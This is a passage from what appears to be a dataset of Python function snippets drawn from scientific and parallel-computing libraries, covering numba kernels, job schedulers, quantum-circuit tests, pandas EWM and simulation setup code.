outsigma)\n\n if do_full_logging and casa['state']['telemetry-enabled']:\n task_endtime = str(datetime.datetime.now())\n casalog.poststat( 'Task ' + tname + ' complete. 
Start time: ' + task_starttime + ' End time: ' + task_endtime )\n casalog.post('##### End Task: ' + tname + ' ' + spaces + ' #####'+\n '\\n##########################################')\n\n except Exception, instance:\n if(self.__globals__.has_key('__rethrow_casa_exceptions') and self.__globals__['__rethrow_casa_exceptions']) :\n raise\n else :\n #print '**** Error **** ',instance\n tname = 'spxfit'\n casalog.post('An error occurred running task '+tname+'.', 'ERROR')\n pass\n casalog.origin('')\n\n return result", "def get_pij_numba(d, scale, i):\n \n d_scaled = -d/scale\n d_scaled -= np.max(d_scaled)\n exp_D = np.exp(d_scaled)\n exp_D[i] = 0\n \n return exp_D/np.sum(exp_D)", "def addJob(self, args, functionToRun, identifier, metadata=None, forceUseThreads = False, uniqueHandler=\"any\", clientQueue = False, groupInfo = None):\n assert \"original_function\" in dir(functionToRun), \"to parallelize a function, it must be\" \\\n \" decorated with RAVEN Parallel decorator\"\n if self._server is None or forceUseThreads:\n internalJob = Runners.factory.returnInstance('SharedMemoryRunner', args,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n else:\n if self._parallelLib == ParallelLibEnum.dask:\n arguments = tuple([self._server] + list(args))\n else:\n arguments = args\n if self._parallelLib == ParallelLibEnum.dask:\n internalJob = Runners.factory.returnInstance('DaskRunner', arguments,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n\n elif self._parallelLib == ParallelLibEnum.ray:\n internalJob = Runners.factory.returnInstance('RayRunner', arguments,\n functionToRun.remote,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n # set the client info\n internalJob.clientRunner = clientQueue\n # set the grouping id if present\n if groupInfo is not None:\n groupId = groupInfo['id']\n # TODO: create method in Runner to set flags, ids, etc. in the instantiated runner\n internalJob.groupId = groupId\n if groupId not in self.__batching:\n # NOTE: The size of the group is only set once the first job belonging to a group is added\n # ***** THE size of a group is IMMUTABLE *****\n self.__batching[groupId] = {\"counter\": 0, \"ids\": [], \"size\": groupInfo['size'], 'finished': []}\n self.__batching[groupId][\"counter\"] += 1\n if self.__batching[groupId][\"counter\"] > self.__batching[groupId][\"size\"]:\n self.raiseAnError(RuntimeError, f\"group id {groupId} is full. 
Size reached:\")\n self.__batching[groupId][\"ids\"].append(identifier)\n # add the runner in the Queue\n self.reAddJob(internalJob)", "def run_job(job, interrupt_if_necessary):", "def test_diff_method_None_jit():\n\n dev = qml.device(\"default.qubit.jax\", wires=1, shots=10)\n\n @jax.jit\n def wrapper(x):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(x, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return qml.execute([tape], dev, gradient_fn=None)\n\n assert jax.numpy.allclose(wrapper(jax.numpy.array(0.0))[0], 1.0)", "def round_numba(g):\n N = len(g)\n gr = np.zeros(N)\n for i in range(N):\n gr[i] = round(g[i])\n return gr", "def run_job(args):\n\n global stop_all\n global jobfiles_global\n global jobwcl\n\n jobwcl = WCL()\n jobfiles = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n jobfiles_global = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n\n jobstart = time.time()\n with open(args.config, 'r') as wclfh:\n jobwcl.read(wclfh, filename=args.config)\n jobwcl['verify_files'] = miscutils.checkTrue('verify_files', jobwcl, False)\n jobwcl['jobroot'] = os.getcwd()\n jobwcl['job_max_usage'] = 0\n #jobwcl['pre_job_disk_usage'] = pfwutils.diskusage(jobwcl['jobroot'])\n jobwcl['pre_job_disk_usage'] = 0\n\n # Save pointers to archive information for quick lookup\n if jobwcl[pfwdefs.USE_HOME_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_HOME_ARCHIVE_OUTPUT] != 'never':\n jobwcl['home_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.HOME_ARCHIVE]]\n else:\n jobwcl['home_archive_info'] = None\n\n if jobwcl[pfwdefs.USE_TARGET_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_TARGET_ARCHIVE_OUTPUT] != 'never':\n jobwcl['target_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.TARGET_ARCHIVE]]\n else:\n jobwcl['target_archive_info'] = None\n\n # run the tasks (i.e., each wrapper execution)\n stop_all = miscutils.checkTrue('stop_on_fail', jobwcl, True)\n\n try:\n jobfiles['infullnames'] = gather_initial_fullnames()\n jobfiles_global['infullnames'].extend(jobfiles['infullnames'])\n miscutils.coremakedirs('log')\n miscutils.coremakedirs('outputwcl')\n exitcode, jobfiles = job_workflow(args.workflow, jobfiles, jobwcl)\n except Exception:\n (extype, exvalue, trback) = sys.exc_info()\n print '!' * 60\n traceback.print_exception(extype, exvalue, trback, file=sys.stdout)\n exitcode = pfwdefs.PF_EXIT_FAILURE\n print \"Aborting rest of wrapper executions. 
Continuing to end-of-job tasks\\n\\n\"\n\n try:\n create_junk_tarball(jobwcl, jobfiles, exitcode)\n except:\n print \"Error creating junk tarball\"\n # if should transfer at end of job\n if jobfiles['output_putinfo']:\n print \"\\n\\nCalling file transfer for end of job (%s files)\" % \\\n (len(jobfiles['output_putinfo']))\n\n copy_output_to_archive(jobwcl, jobfiles, jobfiles['output_putinfo'], 'job',\n 'job_output', exitcode)\n else:\n print \"\\n\\n0 files to transfer for end of job\"\n if miscutils.fwdebug_check(1, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"len(jobfiles['outfullnames'])=%s\" % \\\n (len(jobfiles['outfullnames'])))\n print \"\\nDESDMTIME: pfwrun_job %0.3f\" % (time.time()-jobstart)\n return exitcode", "def serial_job(func, inputs):\n\n output = []\n for i, finput in enumerate(inputs):\n foutput = func(finput)\n output.append(foutput)\n output = np.array(output, dtype=object)\n\n return np.transpose(output)", "def __call__(self, *args, **kwargs):\n\n wait_for = kwargs.pop(\"wait_for\", None)\n\n # {{{ run control\n\n key_bits = kwargs.pop(\"key_bits\", None)\n if key_bits is None:\n key_bits = int(np.iinfo(self.key_dtype).bits)\n\n n = len(args[self.first_array_arg_idx])\n\n allocator = kwargs.pop(\"allocator\", None)\n if allocator is None:\n allocator = args[self.first_array_arg_idx].allocator\n\n queue = kwargs.pop(\"allocator\", None)\n if queue is None:\n queue = args[self.first_array_arg_idx].queue\n\n args = list(args)\n\n base_bit = 0\n while base_bit < key_bits:\n sorted_args = [\n cl.array.empty(queue, n, arg_descr.dtype, allocator=allocator)\n for arg_descr in self.arguments\n if arg_descr.name in self.sort_arg_names]\n\n scan_args = args + sorted_args + [base_bit]\n\n last_evt = self.scan_kernel(*scan_args,\n **dict(queue=queue, wait_for=wait_for))\n wait_for = [last_evt]\n\n # substitute sorted\n for i, arg_descr in enumerate(self.arguments):\n if arg_descr.name in self.sort_arg_names:\n args[i] = sorted_args[self.sort_arg_names.index(arg_descr.name)]\n\n base_bit += self.bits\n\n return [arg_val\n for arg_descr, arg_val in zip(self.arguments, args)\n if arg_descr.name in self.sort_arg_names], last_evt\n\n # }}}", "def process_kernel_arg(\n self, var, llvm_arg, arg_type, index, modified_arrays, sycl_queue_val\n ):\n if isinstance(arg_type, types.npytypes.Array):\n if llvm_arg is None:\n raise NotImplementedError(arg_type, var)\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle array size\n array_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 2),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n array_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n 
),\n ty,\n )\n\n # Handle itemsize\n item_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 3),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n item_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Calculate total buffer size\n total_size = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.intp),\n size=utils.get_one(context=self.context),\n name=\"total_size\" + str(self.cur_arg),\n )\n self.builder.store(\n self.builder.sext(\n self.builder.mul(\n self.builder.load(array_size_member),\n self.builder.load(item_size_member),\n ),\n utils.get_llvm_type(context=self.context, type=types.intp),\n ),\n total_size,\n )\n\n # Handle data\n data_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 4),\n ],\n )\n\n # names are replaced using legalize names, we have to do the same\n # here for them to match.\n legal_names = legalize_names([var])\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.voidptr)\n\n if isinstance(arg_type, nus.UsmSharedArrayType):\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n else:\n malloc_fn = DpctlCAPIFnBuilder.get_dpctl_malloc_shared(\n builder=self.builder, context=self.context\n )\n memcpy_fn = DpctlCAPIFnBuilder.get_dpctl_queue_memcpy(\n builder=self.builder, context=self.context\n )\n event_del_fn = DpctlCAPIFnBuilder.get_dpctl_event_delete(\n builder=self.builder, context=self.context\n )\n event_wait_fn = DpctlCAPIFnBuilder.get_dpctl_event_wait(\n builder=self.builder, context=self.context\n )\n\n # Not known to be USM so we need to copy to USM.\n buffer_name = \"buffer_ptr\" + str(self.cur_arg)\n # Create void * to hold new USM buffer.\n buffer_ptr = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n name=buffer_name,\n )\n # Setup the args to the USM allocator, size and SYCL queue.\n args = [\n self.builder.load(total_size),\n self.builder.load(sycl_queue_val),\n ]\n # Call USM shared allocator and store in buffer_ptr.\n self.builder.store(self.builder.call(malloc_fn, args), buffer_ptr)\n\n if legal_names[var] in modified_arrays:\n self.write_buffs.append((buffer_ptr, total_size, data_member))\n else:\n self.read_only_buffs.append((buffer_ptr, total_size, data_member))\n\n # We really need to detect when an array needs to be copied over\n if index < self.num_inputs:\n args = [\n self.builder.load(sycl_queue_val),\n self.builder.load(buffer_ptr),\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(\n context=self.context, type=types.voidptr\n ),\n ),\n self.builder.load(total_size),\n ]\n event_ref = self.builder.call(memcpy_fn, args)\n self.builder.call(event_wait_fn, [event_ref])\n self.builder.call(event_del_fn, [event_ref])\n\n self._form_kernel_arg_and_arg_ty(self.builder.load(buffer_ptr), ty)\n\n # Handle shape\n shape_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 5),\n ],\n )\n\n for this_dim in range(arg_type.ndim):\n shape_entry = self.builder.gep(\n shape_member,\n [\n 
self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_dim),\n ],\n )\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n shape_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle strides\n stride_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 6),\n ],\n )\n\n for this_stride in range(arg_type.ndim):\n stride_entry = self.builder.gep(\n stride_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_stride),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n stride_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n else:\n ty = numba_type_to_dpctl_typenum(context=self.context, type=arg_type)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n llvm_arg,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )", "def ExecuteInstanceDeterministicAdaptiveRefinementAux_Functionality(pickled_model,pickled_project_parameters,current_analysis_stage,random_variable,previous_computational_time,mapping_flag,pickled_mapping_reference_model,print_to_file,filename,open_mp_threads):\n\n start_time = time.time()\n # overwrite the old model serializer with the unpickled one\n model_serializer = pickle.loads(pickled_model)\n current_model = KratosMultiphysics.Model()\n model_serializer.Load(\"ModelSerialization\",current_model)\n del(model_serializer)\n # overwrite the old parameters serializer with the unpickled one\n serialized_project_parameters = pickle.loads(pickled_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n\n # Set IS_RESTARTED flag to True, STEP to zero and TIME to 0,\n # since the model has already been initialized and eventually run.\n # The model we run is coming from\n # level 0: directly from serialization, where Initialize() method is called\n # level > 0: from ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(),\n # where the model is run and then returned as an output.\n model_part_name = current_project_parameters[\"solver_settings\"][\"model_part_name\"].GetString()\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.TIME, 0.0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.STEP, 0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.IS_RESTARTED, True)\n\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index: always True\n simulation.is_current_index_maximum_index = True\n # mapping if in current finest level (always true) and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n 
serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,computational_time", "def parallelize_initfunction(targetlist, callerfunc,concurrentevents=5, *extrafuncargs):\r\n\r\n parallelizehandle = uniqueid_getid()\r\n\r\n # set up the dict locally one line at a time to avoid a ginormous line\r\n handleinfo = {}\r\n handleinfo['abort'] = False\r\n handleinfo['callfunc'] = callerfunc\r\n handleinfo['callargs'] = extrafuncargs\r\n # make a copy of target list because \r\n handleinfo['targetlist'] = targetlist[:]\r\n handleinfo['availabletargetpositions'] = range(len(handleinfo['targetlist']))\r\n handleinfo['result'] = {'exception':[],'returned':[],'aborted':[]}\r\n handleinfo['runninglist'] = []\r\n\r\n \r\n parallelize_info_dict[parallelizehandle] = handleinfo\r\n\r\n # don't start more threads than there are targets (duh!)\r\n threads_to_start = min(concurrentevents, len(handleinfo['targetlist']))\r\n\r\n for workercount in range(threads_to_start):\r\n # we need to append the workercount here because we can't return until \r\n # this is scheduled without having race conditions\r\n parallelize_info_dict[parallelizehandle]['runninglist'].append(workercount)\r\n try:\r\n settimer(0.0, parallelize_execute_function, (parallelizehandle,workercount))\r\n except:\r\n # If I'm out of resources, stop\r\n # remove this worker (they didn't start)\r\n parallelize_info_dict[parallelizehandle]['runninglist'].remove(workercount)\r\n if not parallelize_info_dict[parallelizehandle]['runninglist']:\r\n parallelize_closefunction(parallelizehandle)\r\n raise Exception, \"No events available!\"\r\n break\r\n \r\n return parallelizehandle", "def _minmaxkernel_numba(data_1, data_2):\n\n\n result = np.zeros((data_1.shape[0], data_2.shape[0]), dtype=np.float64)\n\n for i in prange(data_1.shape[0]):\n for j in prange(data_2.shape[0]):\n result[i,j] = _minmax_two_fp(data_1[i], data_2[j])\n return result", "def ms_function(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n logger.warning(\"'mindspore.ms_function' will be deprecated and removed in a future version. \"\n \"Please use 'mindspore.jit' instead.\")\n return jit(fn=fn, input_signature=input_signature, hash_args=hash_args, jit_config=jit_config)", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! 
Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. {desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def minimize(fun, \n bounds = None, \n value_limit = math.inf,\n num_retries = 1000,\n logger = None,\n workers = mp.cpu_count(),\n popsize = 31, \n max_evaluations = 50000, \n capacity = 500,\n stop_fittness = None,\n optimizer = None,\n ):\n\n if optimizer is None:\n optimizer = de_cma(max_evaluations, popsize, stop_fittness) \n store = Store(bounds, capacity = capacity, logger = logger)\n return retry(fun, store, optimizer.minimize, num_retries, value_limit, workers)", "def test_onearg_and_default(self):\n varargs = (12,)\n kwargs = {}\n method = getattr(self.foo,'f_onearg_and_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 2)\n var_dict = reassign_function_arguments(method, (12, 13), kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 13)\n self.assert_(len(var_dict) == 2)", "def job_in(fn):\n @wraps(fn)\n def new(job):\n # do something with the job object\n return fn(job.arg)\n return new", "def job_gen(self, time_frame):", "def generate_numba_ewm_func(\n nopython: bool,\n nogil: bool,\n parallel: bool,\n com: float,\n adjust: bool,\n ignore_na: bool,\n deltas: tuple,\n normalize: bool,\n):\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def ewm(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n ) -> np.ndarray:\n result = np.empty(len(values))\n alpha = 1.0 / (1.0 + com)\n old_wt_factor = 1.0 - alpha\n new_wt = 1.0 if adjust else alpha\n\n for i in numba.prange(len(begin)):\n 
start = begin[i]\n stop = end[i]\n window = values[start:stop]\n sub_result = np.empty(len(window))\n\n weighted = window[0]\n nobs = int(not np.isnan(weighted))\n sub_result[0] = weighted if nobs >= minimum_periods else np.nan\n old_wt = 1.0\n\n for j in range(1, len(window)):\n cur = window[j]\n is_observation = not np.isnan(cur)\n nobs += is_observation\n if not np.isnan(weighted):\n if is_observation or not ignore_na:\n if normalize:\n # note that len(deltas) = len(vals) - 1 and deltas[i]\n # is to be used in conjunction with vals[i+1]\n old_wt *= old_wt_factor ** deltas[start + j - 1]\n else:\n weighted = old_wt_factor * weighted\n if is_observation:\n if normalize:\n # avoid numerical errors on constant series\n if weighted != cur:\n weighted = old_wt * weighted + new_wt * cur\n if normalize:\n weighted = weighted / (old_wt + new_wt)\n if adjust:\n old_wt += new_wt\n else:\n old_wt = 1.0\n else:\n weighted += cur\n elif is_observation:\n weighted = cur\n\n sub_result[j] = weighted if nobs >= minimum_periods else np.nan\n\n result[start:stop] = sub_result\n\n return result\n\n return ewm", "def test_MPI_Parallel_Interface(comm):\n\n def printMPI(msg):\n for i in range(comm.Get_size()):\n comm.barrier()\n if comm.Get_rank() == i:\n print(\"Proc {}: {}\".format(i, msg))\n\n n = 10\n\n par = MPI_Objective_Interface(mp.Extended_Rosenbrock, nb_domain_grid_pts=n,\n comm=comm)\n\n printMPI(par.counts)\n\n # ref = mp.Extended_Rosenbrock\n\n np.testing.assert_array_equal(\n mp.Extended_Rosenbrock.startpoint(n)[par.subdomain_slices],\n par.startpoint())\n np.testing.assert_almost_equal(\n mp.Extended_Rosenbrock.f(mp.Extended_Rosenbrock.startpoint(n)),\n par.f(par.startpoint()),\n err_msg=\"Different Function Value at startpoint\")\n np.testing.assert_allclose(\n mp.Extended_Rosenbrock.grad(mp.Extended_Rosenbrock.startpoint(n))[\n par.subdomain_slices],\n par.grad(par.startpoint()),\n err_msg=\"Different Gradient Value at startpoint\")", "def test_parallel_kwargs():\r\n lst = range(10)\r\n for n_jobs in (1, 4):\r\n yield (nose.tools.assert_equal,\r\n [f(x, y=1) for x in lst],\r\n Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst)\r\n )", "def func(job):\n return start_process(job)", "def nop_minifier(arg):\n return arg", "def par(func):\n opt[\"par\"].add(key(func))\n return func", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def parallel(self, func, args_dict=None):\n try:\n self.parallel_safe(func, args_dict)\n except Exception:\n pass", "def sum_numba(A):\n N = A.shape\n B = np.zeros((N[0], N[2]))\n for i in range(N[0]):\n for j in range(N[2]):\n for k in range(N[1]):\n B[i, j] += A[i, k, j]\n return B", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def createjob(args):\n ncell = args.ncell\n nmg = args.nmg\n nsi = args.nsi\n nvac = args.nvac\n a0 = args.a0\n temp = args.temp\n nseeds = args.nseeds\n seeds = args.seeds\n nsteps = args.nsteps\n foldername_append = args.foldername_append\n pot = args.pot\n submit = args.submit\n submitdebug = args.submitdebug\n submittime_hours = args.submittime_hours\n test = args.test\n testfiles = args.testfiles\n nodes = args.nodes\n verbose = args.verbose\n\n\n ### check if ase runner/quippy/lammpps-data formats are known\n ase_formats = mu.ase_get_known_formats_class(verbose=True)\n ase_formats.check_if_default_formats_known(copy_and_adapt_formatspy_anyhow=False)\n\n # definex ffsocket inet/unix\n if nodes == 1:\n ffsocket = \"unix\"\n elif nodes > 1:\n ffsocket = \"inet\"\n 
else:\n sys.exit(\"Number of nodes has to be positive!\")\n\n\n # define ntasks, neval\n lmp_par = 2 # = OMP_NUM_THREADS\n ntasks = cores = nodes * 28\n ipi_inst = 4 # for sure best on fidis\n neval = ipi_inst*2 # was alwasy better, for ompi and impi\n\n ##### get the seed(s).\n if type(seeds) == bool:\n seeds = random.sample(range(1, 999999), nseeds)\n print('seeds',seeds)\n if test == True:\n nseeds = 1\n seeds = [1]\n print('seeds',seeds)\n nseeds = len(seeds)\n\n ##### a few checks\n scripts = mu.scripts()\n mypot = mu.mypot(pot)\n if submit is True or submitdebug is True:\n hostcheck = os.environ[\"myhost\"]\n if hostcheck == \"\":\n sys.exit('host unknown 87')\n\n\n ##### here only chck if the potential can be set up. (in.lmp)\n ##### the same command is then executed for every kmc folder\n ace = mu.ase_calculate_ene(pot=pot,\n potpath=False,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket)\n\n ##### if test\n if test == True:\n nsteps = 50\n\n file_ipi_input_runner = scripts + \"/i-pi-mc_scripts/input-runner.xml\"\n\n\n ####################################\n # get directory\n ####################################\n if verbose:\n print(\"get directory\")\n pcsi = nsi/ncell**3.*100\n pcmg = nmg/ncell**3.*100\n pcvac = nvac/ncell**3.*100\n if args.cubic == True:\n pc = \"cubic\"\n else:\n pc = \"primitive\"\n directory = str(ncell)+\"x\"+str(ncell)+\"x\"+str(ncell)+\"_\"+pc+\"_\"+pot+\"_\"+\\\n str(temp)+\"K_\"+\\\n str(nvac)+\"Vac_\"+str(nmg)+\"Mg_\"+str(nsi)+\"Si__\"+\\\n str(round(pcvac,3))+\"pctVac_\"+str(round(pcmg,3))+\"pctMg_\"+str(round(pcsi,3))+\"pctSi\"\n if foldername_append != \"\":\n directory = directory+\"_\"+foldername_append\n\n ###############################################\n # make the structure\n ###############################################\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,create_fake_vacancy = True,cubic=args.cubic)\n atomsc = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,cubic=args.cubic)\n\n # make the atomic structure\n # this was to play ... 
not necessary now?\n if False:\n nndist = a0/np.sqrt(2.)\n\n from ase.io import read as ase_read\n from ase.io import write as ase_write\n\n ###############################################\n # get the amount of 1NN in a relly large cell\n ###############################################\n atomsc_fakevac_i = ase_read('dataxx.extxyz3',index=\":\",format='extxyz') # works, cell ist not changed\n #atomsc_fakevac_i = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=10,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=3.,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=8.5,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #sys.exit()\n\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('ipi')\n atomsc_fakevac_i = ase_read('dataxx.ipi2',index=\":\",format='ipi') # works, cell ist not changed\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('quippy')\n atomsc_fakevac_i = ase_read('dataxx.quippy.xyz2',index=\":\",format='quippy') # works, cell ist not changed\n\n\n\n filename = '../sim.xyz'\n filename = '../simulation.pos_0.xyz'\n mu.count_amount_1NN_around_vacancies(filename,cutoffa=nndist,cutoffb=a0,skin=0.1,format='ipi')\n sys.exit()\n\n def mysave_quippy_xyz(atomsc_fakevac,text=False):\n if type(text) == bool:\n sys.exit('define text')\n atomsc_fakevac.write('data.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data.xyz',format=\"extxyz\",append=True)\n atomsc_fakevac.write('data'+text+'.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data'+text+'.xyz',format=\"extxyz\",append=True)\n return\n\n # create Al with single vacancy\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n #print('from ....',(atomsc_fakevac.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac.positions)[i])\n print('NN_1_indices (orig ):',NN_1_indices)\n print('NN_2_indices (orig ):',NN_2_indices)\n 